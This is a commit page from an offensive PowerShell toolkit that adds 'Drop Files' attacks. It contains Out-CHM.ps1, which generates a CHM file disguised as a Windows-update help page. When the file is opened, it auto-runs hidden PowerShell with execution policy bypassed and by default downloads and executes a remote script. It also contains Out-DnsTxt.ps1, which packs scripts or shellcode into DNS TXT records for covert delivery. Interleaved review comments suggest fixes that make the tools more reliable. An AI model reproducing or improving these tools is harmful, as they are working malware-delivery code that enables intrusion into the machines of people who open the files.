Added dropping weaponized files attacks
samratashok committed Jan 26, 2015
1 parent 0946db5 commit 9a0175b
Showing 21 changed files with 5,197 additions and 492 deletions.
9 changes: 9 additions & 0 deletions CHANGELOG
@@ -1,3 +1,12 @@
0.5.5
- Added new category of attacks "Drop Files"
- Added "Drop a MS Word File" under Drop Files category.
- Added "Drop a MS Excel File" under Drop Files category.
- Added "Drop a CHM (Compiled HTML Help) file" under Drop Files category.
- Added "Drop a Shortcut (.LNK) file" under Drop Files category.
- Added "Drop a JAR file" under Drop Files category.
- Fixed a bug where function call for "Code Execution using DNS TXT queries" had a typo.
- Improvements to "Code Execution using DNS TXT queries", Rogue AP and "DNS TXT Backdoor".
0.5.4
- Fixed hash corruption bug in "Hashdump and Exfiltrate" payload.
- Changes to Compression and Encoding for some payloads.
177 changes: 177 additions & 0 deletions extras/Out-CHM.ps1
@@ -0,0 +1,177 @@

function Out-CHM
{

<#
.SYNOPSIS
Nishang script modified for Kautilya, useful for creating Compiled HTML Help file (.CHM) which could be used to run PowerShell commands and scripts.
.DESCRIPTION
The script generates a CHM file which needs to be sent to a target.
You must have hhc.exe (HTML Help Workshop) on your machine to use this script.
HTML Help Workshop is a free Microsoft Tool and could be downloaded from below link:
http://www.microsoft.com/en-us/download/details.aspx?id=21138
.PARAMETER Payload
Payload which you want execute on the target.
.PARAMETER PayloadURL
URL of the powershell script which would be executed on the target.
.PARAMETER Arguments
Arguments to the powershell script to be executed on the target.
.PARAMETER OutputPath
Path to the directory where the files would be saved. Default is the current directory.
.EXAMPLE
PS > Out-CHM -Payload "Get-Process" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Above command would execute Get-Process on the target machine when the CHM file is opened.
.EXAMPLE
PS > Out-CHM -PayloadURL http://192.168.254.1/Get-Information.ps1 -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Use above command to generate CHM file which download and execute the given powershell script in memory on target.
.EXAMPLE
PS > Out-CHM -Payload "-EncodedCommand <>" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Use above command to generate CHM file which executes the encoded command/script.
Use Invoke-Encode from Nishang to encode the command or script.
.EXAMPLE
PS > Out-CHM -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Use above command to pass an argument to the powershell script/module.
.LINK
http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html
https://github.com/samratashok/nishang
.Notes
Based on the work mentioned in this tweet by @ithurricanept
https://twitter.com/ithurricanept/status/534993743196090368
#>



[CmdletBinding()] Param(

[Parameter(Position = 0, Mandatory = $False)]
[String]
$Payload,

[Parameter(Position = 1, Mandatory = $False)]
[String]
$PayloadURL,

[Parameter(Position = 2, Mandatory = $False)]
[String]
$Arguments,

[Parameter(Position = 3, Mandatory = $True)]
[String]
$HHCPath,

[Parameter(Position = 4, Mandatory = $False)]
[String]
$OutputPath="$pwd"
)

#Check if the payload has been provided by the user
if(!$Payload)
{
$Payload = "IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments"
}

#Create the table of contents for the CHM
$CHMTableOfContents = @"
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<meta name="GENERATOR" content="Microsoft&reg; HTML Help Workshop 4.1">
<!-- Sitemap 1.0 -->
</HEAD><BODY>
<UL>
<LI> <OBJECT type="text/sitemap">
<param name="Name" value="IPv4 Advanced IP Settings Tab">
<param name="Local" value="doc.htm">
</OBJECT>
</UL>
</BODY>
</HTML>
"@

#Create the Project file for the CHM
$CHMProject = @"
[OPTIONS]
Contents file=$OutputPath\doc.hhc
[FILES]
$OutputPath\doc.htm
"@
#Create the HTM files, the first one controls the payload execution.
$CHMHTML1 = @"
<HTML>
<TITLE>Check for Windows updates from Command Line</TITLE>
<HEAD>
</HEAD>
<BODY>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",cmd.exe,/c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile $Payload">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</BODY>
</HTML>
"@


#Write all files to disk for compilation
Out-File -InputObject $CHMTableOfContents -FilePath "$OutputPath\doc.hhc" -Encoding default
Out-File -InputObject $CHMHTML1 -FilePath "$OutputPath\doc.htm" -Encoding default
Out-File -InputObject $CHMProject -FilePath "$OutputPath\doc.hhp" -Encoding default

#Compile the CHM, only this needs to be sent to a target.
$HHC = "$HHCPath" + "\hhc.exe"
& "$HHC" "$OutputPath\doc.hhp"

#Cleanup
Remove-Item "$OutputPath\doc.hhc"
Remove-Item "$OutputPath\doc.htm"
Remove-Item "$OutputPath\doc.hhp"

#Create a zip archive of the CHM file
$SourceFile = "$OutputPath\doc.chm"
$ZipFile = "$OutputPath\doc.zip"
#http://stackoverflow.com/questions/11021879/creating-a-zipped-compressed-folder-in-windows-using-powershell-or-the-command-l
if(-not (test-path($ZipFile)))
{
Set-Content $ZipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))
}

$shellApplication = new-object -com shell.application
$zippackage = $shellApplication.NameSpace($ZipFile)
$zippackage.copyhere($SourceFile)

#Wait till zip archive is written to the disk
Start-Sleep -Seconds 3

#Read the zip archive in bytes and write to a file
#Use this txt file in Kautilya with the Drop CHM file payload.
[byte[]] $FileContent = Get-Content -Encoding Byte $ZipFile
[System.IO.File]::WriteAllLines("$OutputPath\encodedchm.txt", $FileContent)

#Cleanup
Remove-Item $SourceFile
Remove-Item $ZipFile

}
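Review bot: Neither `$Payload` nor `$PayloadURL` is mandatory, so when both are omitted the fallback at the top of the function assembles a command around an empty URL and the rest of the script still compiles and packages a CHM from it; a guard ahead of that fallback such as `if (-not $Payload -and -not $PayloadURL) { throw 'Specify either -Payload or -PayloadURL.' }` would reject that case up front. The `& "$HHC"` call is likewise made without checking that the file exists, and the Remove-Item, zip and Get-Content steps that follow run whether or not doc.chm was produced, so a wrong `-HHCPath` surfaces only as a cascade of later errors; `if (-not (Test-Path -Path $HHC)) { throw "hhc.exe not found at $HHC" }` before the invocation gives one clear failure. The comment-based help documents every parameter except the only mandatory one, `$HHCPath`; a `.PARAMETER HHCPath` entry stating that it is the directory containing hhc.exe (as the examples show) would complete it.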
113 changes: 113 additions & 0 deletions extras/Out-DnsTxt.ps1
@@ -0,0 +1,113 @@
function Out-DnsTxt
{
<#
.SYNOPSIS
Script for Nishang to generate DNS TXT records which could be used with other scripts.
.DESCRIPTION
Use this script to generate DNS TXT records to be used with DNS_TXT_Pwnage and Execute-DNSTXT-Code.
The script asks for a path to a plain file or string, compresses and encodes it and writes to a file "encodedtxt.txt" in the current working directory.
Each line in the generated file is a DNS TXT record to be saved in separate subbdomain.
The length of DNS TXT records is assumed to be 255 characters by the script.
.PARAMETER DataToEncode
The path of the file to be decoded. Use with -IsString to enter a string.
.PARAMETER OutputFilePath
The path of the output file. Default is "encodedtxt.txt" in the current working directory.
.PARAMETER $LengthOfTXT
The length of the TXT records. Default is 255.
.PARAMETER IsString
Use this to specify the command to be encoded if you are passing a string in place of a filepath.
.EXAMPLE
PS > OUT-DNSTXT -DataToEncode C:\nishang\Gather\Get-Information.ps1
Use above command to generate encoded DNS TXT records. Each record must be put in a separate subdomain.
.EXAMPLE
PS > OUT-DNSTXT "Get-Service" -IsString
Use above to generate TXT records for a command.
.EXAMPLE
PS > OUT-DNSTXT -DataToEncode C:\shellcode\shellcode.txt
Use above command to generate encoded DNS TXT records for a shellcode. Each record must be put in a separate subdomain.
.LINK
http://www.labofapenetrationtester.com/2015/01/fun-with-dns-txt-records-and-powershell.html
https://github.com/samratashok/nishang
#>
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$DataToEncode,

[Parameter(Position = 1, Mandatory = $False)]
[String]
$OutputFilePath = "$pwd\encodedtxt.txt",

[Parameter(Mandatory = $False)]
[String]
$LengthOfTXT = 255,

[Switch]
$IsString
)
if($IsString -eq $true)
{

$Enc = $DataToEncode

}
else
{
$Enc = Get-Content $DataToEncode -Encoding Ascii
}

#Compression logic from http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
$ms = New-Object IO.MemoryStream
$action = [IO.Compression.CompressionMode]::Compress
$cs = New-Object IO.Compression.DeflateStream ($ms,$action)
$sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
$Enc | ForEach-Object {$sw.WriteLine($_)}
$sw.Close()
# Base64 encode stream
$Compressed = [Convert]::ToBase64String($ms.ToArray())
$index = [math]::floor($Compressed.Length/$LengthOfTXT)
$i = 0
Out-File -InputObject $null -FilePath $OutputFilePath
#Split encoded input in strings of 255 characters if its length is more than 255.
if ($Compressed.Length -gt $LengthOfTXT)
{
while ($i -lt $index )
{
$TXTRecord = $Compressed.Substring($i*$LengthOfTXT,$LengthOfTXT)
$i +=1
Out-File -InputObject $TXTRecord -FilePath $OutputFilePath -Append
Out-File -InputObject "`n`n`n" -FilePath $OutputFilePath -Append
}
$remainingindex = $Compressed.Length%$LengthOfTXT
if ($remainingindex -ne 0)
{
$TXTRecord = $Compressed.Substring($index*$LengthOfTXT, $remainingindex)
$TotalRecords = $index + 1
}
#Write to file
Out-File -InputObject $TXTRecord -FilePath $OutputFilePath -Append
Write-Output "You need to create $TotalRecords TXT records."
Write-Output "All TXT Records written to $OutputFilePath"
}
#If the input has small length, it could be used in a single subdomain.
else
{
Write-Output "TXT Record could fit in single subdomain."
Write-Output $Compressed
Out-File -InputObject $Compressed -FilePath $OutputFilePath -Append
Write-Output "TXT Records written to $OutputFilePath"
}


}
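Review bot: In the `-gt $LengthOfTXT` branch, `$TotalRecords` is assigned only inside `if ($remainingindex -ne 0)`, so when the compressed length is an exact multiple of `$LengthOfTXT` the summary reports an empty count and the unconditional `Out-File -InputObject $TXTRecord` after that block writes the loop's final chunk to the file a second time. Setting `$TotalRecords = $index` just before the `if` and moving `Out-File -InputObject $TXTRecord -FilePath $OutputFilePath -Append` inside it fixes both. `$LengthOfTXT` is declared `[String]` but is used numerically in `[math]::floor`, `Substring` and `%`; declaring it `[Int]` would reject non-numeric values at parameter binding instead of failing mid-run. In the help block, `.PARAMETER $LengthOfTXT` should read `.PARAMETER LengthOfTXT` (the leading `$` is unlikely to match the parameter in Get-Help output), and `DataToEncode` is described as the file "to be decoded" where "encoded" is meant.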
